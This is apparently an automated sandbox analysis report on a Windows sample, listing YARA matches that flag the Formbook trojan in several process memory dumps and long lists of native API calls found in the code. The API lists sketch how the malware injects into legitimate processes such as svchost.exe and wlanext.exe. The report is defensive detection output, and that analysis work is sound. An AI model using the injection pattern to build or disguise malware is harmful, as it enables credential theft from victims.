Source: Yara match	File source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.4578868311.000000000E24E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Iifpj4i2kC.exe PID: 6924, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6880, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: csc.exe PID: 4340, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: wlanext.exe PID: 6432, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A360 NtCreateFile,	5_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A410 NtReadFile,	5_2_0041A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A490 NtClose,	5_2_0041A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A540 NtAllocateVirtualMemory,	5_2_0041A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A35B NtCreateFile,	5_2_0041A35B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A3B2 NtCreateFile,	5_2_0041A3B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A40A NtReadFile,	5_2_0041A40A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041A48B NtClose,	5_2_0041A48B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_05602D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_05602D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_05602DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602DD0 NtDelayExecution,LdrInitializeThunk,	5_2_05602DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_05602C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_05602CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602F30 NtCreateSection,LdrInitializeThunk,	5_2_05602F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602FE0 NtCreateFile,LdrInitializeThunk,	5_2_05602FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602FB0 NtResumeThread,LdrInitializeThunk,	5_2_05602FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602F90 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_05602F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_05602EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_05602E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602B60 NtClose,LdrInitializeThunk,	5_2_05602B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_05602BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602AD0 NtReadFile,LdrInitializeThunk,	5_2_05602AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056035C0 NtCreateMutant,	5_2_056035C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05604650 NtSuspendThread,	5_2_05604650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05603010 NtOpenDirectoryObject,	5_2_05603010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05603090 NtSetValueKey,	5_2_05603090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05604340 NtSetContextThread,	5_2_05604340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05603D70 NtOpenThread,	5_2_05603D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602D00 NtSetInformationFile,	5_2_05602D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05603D10 NtOpenProcessToken,	5_2_05603D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602DB0 NtEnumerateKey,	5_2_05602DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602C60 NtCreateKey,	5_2_05602C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602C00 NtQueryInformationProcess,	5_2_05602C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602CF0 NtOpenProcess,	5_2_05602CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602CC0 NtQueryVirtualMemory,	5_2_05602CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602F60 NtCreateProcessEx,	5_2_05602F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602FA0 NtQuerySection,	5_2_05602FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602E30 NtWriteVirtualMemory,	5_2_05602E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602EE0 NtQueueApcThread,	5_2_05602EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056039B0 NtGetContextThread,	5_2_056039B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602BE0 NtQueryValueKey,	5_2_05602BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602BA0 NtEnumerateValueKey,	5_2_05602BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602B80 NtQueryInformationFile,	5_2_05602B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602AF0 NtWriteFile,	5_2_05602AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602AB0 NtWaitForSingleObject,	5_2_05602AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	5_2_0510A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510A042 NtQueryInformationProcess,	5_2_0510A042
Source: C:\Windows\explorer.exe	Code function: 6_2_0E236232 NtCreateFile,	6_2_0E236232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E237E12 NtProtectVirtualMemory,	6_2_0E237E12
Source: C:\Windows\explorer.exe	Code function: 6_2_0E237E0A NtProtectVirtualMemory,	6_2_0E237E0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00FDF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,	7_2_00FDF267
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772B60 NtClose,LdrInitializeThunk,	7_2_03772B60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03772BF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_03772BE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772AD0 NtReadFile,LdrInitializeThunk,	7_2_03772AD0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772F30 NtCreateSection,LdrInitializeThunk,	7_2_03772F30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772FE0 NtCreateFile,LdrInitializeThunk,	7_2_03772FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_03772EA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03772D10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03772DF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03772DD0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03772C70
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772C60 NtCreateKey,LdrInitializeThunk,	7_2_03772C60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03772CA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037735C0 NtCreateMutant,LdrInitializeThunk,	7_2_037735C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03774340 NtSetContextThread,	7_2_03774340
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03774650 NtSuspendThread,	7_2_03774650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772BA0 NtEnumerateValueKey,	7_2_03772BA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772B80 NtQueryInformationFile,	7_2_03772B80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772AF0 NtWriteFile,	7_2_03772AF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772AB0 NtWaitForSingleObject,	7_2_03772AB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772F60 NtCreateProcessEx,	7_2_03772F60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772FB0 NtResumeThread,	7_2_03772FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772FA0 NtQuerySection,	7_2_03772FA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772F90 NtProtectVirtualMemory,	7_2_03772F90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772E30 NtWriteVirtualMemory,	7_2_03772E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772EE0 NtQueueApcThread,	7_2_03772EE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772E80 NtReadVirtualMemory,	7_2_03772E80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772D30 NtUnmapViewOfSection,	7_2_03772D30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772D00 NtSetInformationFile,	7_2_03772D00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772DB0 NtEnumerateKey,	7_2_03772DB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772C00 NtQueryInformationProcess,	7_2_03772C00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772CF0 NtOpenProcess,	7_2_03772CF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03772CC0 NtQueryVirtualMemory,	7_2_03772CC0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03773010 NtOpenDirectoryObject,	7_2_03773010
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03773090 NtSetValueKey,	7_2_03773090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037739B0 NtGetContextThread,	7_2_037739B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03773D70 NtOpenThread,	7_2_03773D70
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03773D10 NtOpenProcessToken,	7_2_03773D10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA360 NtCreateFile,	7_2_00EEA360
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA490 NtClose,	7_2_00EEA490
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA410 NtReadFile,	7_2_00EEA410
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA540 NtAllocateVirtualMemory,	7_2_00EEA540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA3B2 NtCreateFile,	7_2_00EEA3B2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA35B NtCreateFile,	7_2_00EEA35B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA48B NtClose,	7_2_00EEA48B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEA40A NtReadFile,	7_2_00EEA40A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A59BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	7_2_03A59BAF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A5A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	7_2_03A5A036
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A59BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_03A59BB2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A5A042 NtQueryInformationProcess,	7_2_03A5A042

Source: C:\Windows\SysWOW64\wlanext.exe

Code function: 7_2_00FDF267: CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,

7_2_00FDF267

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA6DFD0	0_2_00007FF67FA6DFD0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA70C50	0_2_00007FF67FA70C50
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA68830	0_2_00007FF67FA68830
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA72370	0_2_00007FF67FA72370
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA59340	0_2_00007FF67FA59340
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA6D16A	0_2_00007FF67FA6D16A
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA580D0	0_2_00007FF67FA580D0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FB100E0	0_2_00007FF67FB100E0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA5EFE0	0_2_00007FF67FA5EFE0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA73F60	0_2_00007FF67FA73F60
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7BEA0	0_2_00007FF67FA7BEA0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA6FDD0	0_2_00007FF67FA6FDD0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA64CD9	0_2_00007FF67FA64CD9
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA62D30	0_2_00007FF67FA62D30
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA77C79	0_2_00007FF67FA77C79
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA75C20	0_2_00007FF67FA75C20
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA6FB40	0_2_00007FF67FA6FB40
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FB07BA0	0_2_00007FF67FB07BA0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7BBA0	0_2_00007FF67FA7BBA0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FB02AC0	0_2_00007FF67FB02AC0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA46A50	0_2_00007FF67FA46A50
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA69A50	0_2_00007FF67FA69A50
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA56A50	0_2_00007FF67FA56A50
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA84A40	0_2_00007FF67FA84A40
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA799C3	0_2_00007FF67FA799C3
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA51A00	0_2_00007FF67FA51A00
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7F960	0_2_00007FF67FA7F960
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA788D9	0_2_00007FF67FA788D9
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FAA1910	0_2_00007FF67FAA1910
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA6A850	0_2_00007FF67FA6A850
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA4A8B0	0_2_00007FF67FA4A8B0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA5E8A0	0_2_00007FF67FA5E8A0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA667F0	0_2_00007FF67FA667F0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7C800	0_2_00007FF67FA7C800
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA52750	0_2_00007FF67FA52750
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7A7B0	0_2_00007FF67FA7A7B0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA63640	0_2_00007FF67FA63640
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA6B6B0	0_2_00007FF67FA6B6B0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA735C0	0_2_00007FF67FA735C0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA66610	0_2_00007FF67FA66610
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7E540	0_2_00007FF67FA7E540
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7B4F0	0_2_00007FF67FA7B4F0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA644D0	0_2_00007FF67FA644D0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA61520	0_2_00007FF67FA61520
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA71470	0_2_00007FF67FA71470
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA50470	0_2_00007FF67FA50470
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FAF3480	0_2_00007FF67FAF3480
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA483C4	0_2_00007FF67FA483C4
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA49430	0_2_00007FF67FA49430
